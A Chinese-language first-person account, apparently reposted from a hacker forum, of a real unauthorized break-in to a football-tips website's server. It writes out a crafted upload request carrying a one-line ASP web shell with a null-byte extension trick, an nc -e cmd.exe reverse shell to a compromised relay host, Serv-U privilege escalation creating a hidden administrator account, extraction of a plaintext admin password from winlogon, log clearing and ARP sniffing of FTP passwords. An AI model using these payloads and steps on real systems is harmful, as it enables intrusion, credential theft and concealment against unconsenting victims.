一次真实的入侵-------记对一足球推荐站点的渗透
来源: http://www.17nc.com/
由于某些原因!我们要对某足球推荐站点--www.******.com进行渗透,首先当然是踩点了。先用扫描器扫扫。看开什么服务看了下。开21,80,554端口。FTP是serv-u,IIS是6.0的,还有554,嘿嘿,这个服务是什么我忘了。只知道可以溢出,试了下。失败!~!~1没有办法,在回来到他的站点上,到处观察他哪里有漏洞。,或者注入点。找了N久。实在找不出,他功能太少了。利用桂林老兵的工具查他服务器上绑定几个域名,或站点。查出六个。现在的想发就是。找到他们中一个比较弱的来进去。然后打到我们的目的。
很遗憾,他们都是一样的足球推荐站点。而且都上一全方位公司为他们设计的,他们的程序安全性还不错,基本上找不到什么可以利用的地方了。
现在只能用最卑鄙的一招了。arpsniff嗅它他的FTP密码。至于原理我就不在这里多说了。想知道的朋友可以自己去网上看看有关的文章。最成功的例子就是小路写的《黑防主机外部的危险》。
要嗅探,必须进入他们的网关内的机子,而且最好开3389的,用superscan3.0狂扫他们那个网段61.143.****.1-61.143.***.254,可惜。基本上都有防火墙,嘿嘿。防火墙我怕怕。但魔高一尺,道高一丈,呵呵。自然有解决他的方法。专门找开21端口,3389端口和80端口的机子。我扫啊扫啊扫。几乎另我绝望,那个网段活动的主机没有几台,而且好多是linux系统的,拿它无可奈何!~!~!~1
当然,在找漏洞主机的过程是漫长的。遇到好多失败,,,,我现在只说成功的那个,用桂林老兵的工具查到IP为61.143.***.121上有5个站点,(我们的目标IP是61.143.***.108)一个一个试,找SQL注入口,郁闷,几乎都是静态的htm文件。就在我绝望的时候。在网址后面试试http://www.xxx.com/admin出现403错误,嘿嘿。说明存在这个文件夹,admin一般是管理院登陆的地方,凭着经验,试试有没有上传,http://www.xxx.com/admin/uopload.asp嘿嘿,有希望了,
出现Microsoft VBScript 运行时错误 错误 '800a01b6'
对象不支持此属性或方法: 'form'
/admin/upload.asp,行20
说明有这个文件。但这个不可能是他提交的那个而已。于是,试试upload.htm
嘿嘿,出现了可爱的上传页面。看看有没有上传漏洞!~查开源代码
发现有<form name="form" method="post" action="upload.asp" enctype="multipart/form-data" >
<input type="hidden" name="filepath" value="../DA_MUSIC_PIC/" size="20">
<input type="hidden" name="act" value="upload">
嘿嘿。他死定了。上传路径这样定义,经典的上传漏洞!`!~!
离成功不远了。
现在就是老步骤了。抓包,编辑,用NC提交。
我把包的内容说说
POST /admin/upload1.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.***.com/admin/upload1.htm
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d4251a110258
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)
Host: www.haotin.com
Content-Length: 664
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: flux_stat_user=0.18235000 1095404136621813289; ASPSESSIONIDQSBQTDSA=CODBCEJAHFBAFAGNKBPONJKO
-----------------------------7d4251a110258
Content-Disposition: form-data; name="filepath"
../tt90_music_pic/b.asp //这里我多加了b.asp 记得asp 后面有个空格
-----------------------------7d4251a110258
Content-Disposition: form-data; name="act"
upload
-----------------------------7d4251a110258
Content-Disposition: form-data; name="file"; filename="C:/Documents and Settings/SUPPORT_388945a0/桌面/s/ASP木马集合/icyfox007v1.10/asp.jpg" //这里改为他允许上传的文件后缀,
Content-Type: text/html
<SCRIPT RUNAT=SERVER LANGUAGE=javascript>eval(Request.form('830306')+'')</SCRIPT> // 这个是冰湖ASP木马短小就一句话
-----------------------------7d4251a110258
Content-Disposition: form-data; name="Submit"
上传图片
-----------------------------7d4251a110258--
因为我多加了b.asp 六个字节,包括空格所以在Content-Length: 664这里多加了6个字节,
把上面编辑好保存为a.txt然后用UE编辑,把那个空格20改为00就OK了,
然后用NC提交
nc -vv www.xxx.com 80 <a.txt
哈哈提示上传成功。找到我们的木马。用兵湖客户端连上去。在写个海洋ASP木马上去,发现写不进,郁闷啊。环境探测一下。原来不支持FSO,本来想截图的,才发现我把那个木马删去了。
反正就是那个意思了。
下面就探测下他的服务器信息
net start看看开什么服务
已经启动以下 Windows 2000 服务:
Alerter
Automatic updates
Background Intelligent Transfer Service
BlackICE
COM+ Event System
Computer Browser
DHCP Client
Distributed File System
Distributed Link Tracking Client
Distributed Transaction Coordinator
DNS Client
Event Log
IIS Admin Service
IPSEC Policy Agent
License Logging Service
Logical Disk Manager
Messenger
Microsoft Search
MSSQLSERVER
Network Connections
NT LM Security Support Provider
Plug and Play
Print Spooler
Protected Storage
Remote Access Connection Manager
Remote Procedure Call (RPC)
Remote Registry Service
Removable Storage
RunAs Service
Security Accounts Manager
Serv-U FTP 服务器
Server
Symantec AntiVirus
Symantec AntiVirus Definition Watcher
Symantec Event Manager
Symantec Settings Manager
System Event Notification
Task Scheduler
TCP/IP NetBIOS Helper Service
Telephony
Terminal Services
Windows Installer
Windows Management Instrumentation
Windows Management Instrumentation Driver Extensions
Workstation
World Wide Web Publishing Service
命令成功完成。
Serv-U FTP 服务器
Terminal Services
BlackICE
MSSQLSERVER
嘿嘿找到了这几个。我最喜欢 serv-u和Terminal Services
l了
怎么我扫不到3389呢?????难道是防火墙??不可能啊。那他是怎么远程管理的啊》
于是用netstat -an看看开什么端口
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1035 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1180 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1450 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2387 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2390 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2420 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3061 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3372 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4990 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4991 0.0.0.0:0 LISTENING
TCP 0.0.0.0:8933 0.0.0.0:0 LISTENING
55555555555找不到3389,难道是改端口了??急怀疑8933这个端口
(事后证明的确他把终端服务的端口改为8933 了)
现在就是提升权限了。
因为他有防火墙,所以用端口转serv-u的43958是不可能了。但我们用nc啊,嘿嘿这个号称瑞士军到的小东西!~!~!~
上传到上面。使他运行
nc -e cmd.exe 61.186.254.** 1234
61.186.254.**是我公网IP,(其实是肉鸡了)
这个意思就是要他主动连接我的1234端口,并把cmd.exe重定向到我机子的1234端口上。现在就可以逃开他防火墙了。哈哈。!~!~!得意只作!~!~!
精彩的还在后头,由于我太困了,搞了三个小时了。下午还有客,所以就去休息下。让snake来搞搞
呵呵下面就是他写的了。我走也!!~!~1
二、
charey 睡觉去了~晕~把最简单的部分交给我这个菜鸟做~呵呵~我和他是个宿舍的~和他真的学了不少的东西~嘿嘿~ 去睡觉的时候他告诉我说这台机子开了防火墙~晕~开了这个东西的机子想进去真的有些难~还好最近新出了几个工具~~这台机子开了serv-u 服务,我就从这里入手吧,最近在小凤居出了个新的工具------Serv-u Local Exploit,是fantasy告诉我的~我也没有用过,不知道怎么用~郁闷~~!!!不理他先了~我下载一个下来看看不就知道怎么用了吗~?呵呵~看了他的说明,很简单哦serv-u .exe "command" 其中"command"听说可以以管理员的权限运行命令,嘿嘿,用ASP免FSO的木马把工具传上去,用冰狐的客户端运行他,serv-u.exe "net user kkb$ 830306 /add" 提示成功,嘿嘿,我在提升kkb$为管理员,serv-u.exe "net localgroup administrators kkb$ /add"又提示成功了,好简单就让我完成了,呵呵。fantasy 在去睡觉之前说这台机子还开了3389终端服务,现在什么都OK了,我拿出了3389终端连接器连接上去,晕!!!!!连不上,难道不开??我郁闷,不理它,先传个cmd.asp 上去,运行命令。net start看看开什么服务
已经启动以下 Windows 2000 服务:
………………
………………
Terminal Services
Windows Installer
Windows Management Instrumentation
Windows Management Instrumentation Driver Extensions
Workstation
World Wide Web Publishing Service
Terminal Services这个不是3389的终端服务吗?既然开了,那么一定是改了端口了,不理他,我运行netstat -an 看看他开了什么服务,开的服务如下
…………………………
……………………
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4990 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4991 0.0.0.0:0 LISTENING
TCP 0.0.0.0:8933 0.0.0.0:0 LISTENING
这个开的端口就8933很象是连接的端口了,我用3389终端登陆器等上去,呵呵,和我想的一样,果然是8933,二话没说填上kkb$密码830306连接,晕~提示无效用户,我又郁闷~!!!我想是不是serv-u.exe的问题啊~因为毕竟是第一次用啊,可能刚刚没有添加成功。算了,新工具用不了就用nc配合添加serv-u的系统帐号吧,我把NC传上那台机子上面,同时在我的一台肉鸡上运行nc -v -l -p 1234
配合刚刚用的nc -e cmd.exe IP PORT 得到一个guest权限的shell
写一个txt文档,传到他上面,内容如下
USER localadministrator
PASS #l@$ak#.lk;0@P
SITE MAINTENANCE
-SETUSERSETUP
-IP=61.143.251.***
-PortNO=21
-User=kkb
-Password=830306
-HomeDir=c://
-Maintenance=System
-RelPaths=1
Access=c:/|RWAMELCDP
保存为b.txt
添加一个FTP帐号,是系统权限的。再来到刚刚得的那个shell下运行
nc -vv 127.0.0.1 43958 <b.txt
提示
save setting
成功1`!~!用FTP登陆下
进入C盘
为了防止不能添加用户。我采用偷他密码的方法。(有时候他有密码策略,所以会出现添加用户失败)用FTP传pulist.exe和findpass.exe上去。在本地编辑一个bat文件,内容是
c:/winnt/twain_32/pulist.exe >a.txt
把会显的内容写进A.TXT
在FTP里应该这样
ftp>quote site exec a.bat
下载a.txt看看进程和对应的PID值
winlogon.exe 对应的PID值是1252
然后再编辑a.bat
c:/winnt/twain_32/findpass 机器名 管理员名 winlogin.exe的PID值
OK。在下载A。TXT,看到密码了哈哈
To Find Password in the Winlogon process
Usage: c:/winnt/twain_32/findpass.exe DomainName UserName PID-of-WinLogon
The debug privilege has been added to PasswordReminder.
The WinLogon process id is 2512 (0x000009d0).
To find SUPERRRABBIT/D1haokan123.com.net password in process 2512 ...
The encoded password is found at 0x00800800 and has a length of 15.
The logon information is: SUPERRRABBIT/administrator/netChina.com123.
The hash byte is: 0x2a.
密码是netChina.com123
然后就是用他登陆,了。清理日志。然后传嗅探工具arpsniff.exe winpcap.exe
运行
arpsniff 61.143.251.1 61.143.251.** 21 a.txt 0
开始漫长的等待。
由于还没有嗅到密码我就发文章了。呵呵
现在得上去看看得密码没有
呵呵。
还要多谢 sykkk
是他教我们学会嗅探的。
这里没有什么技术可言,都是一些经验。希望能对一些人有帮助。还有,嗅探这招比较毒,如果在我们学校的机子里有一台被拿下的话。其他的主机也有危险。------------------希望网管们注意这个古老的入侵方法,做好防范。
charley & snake1314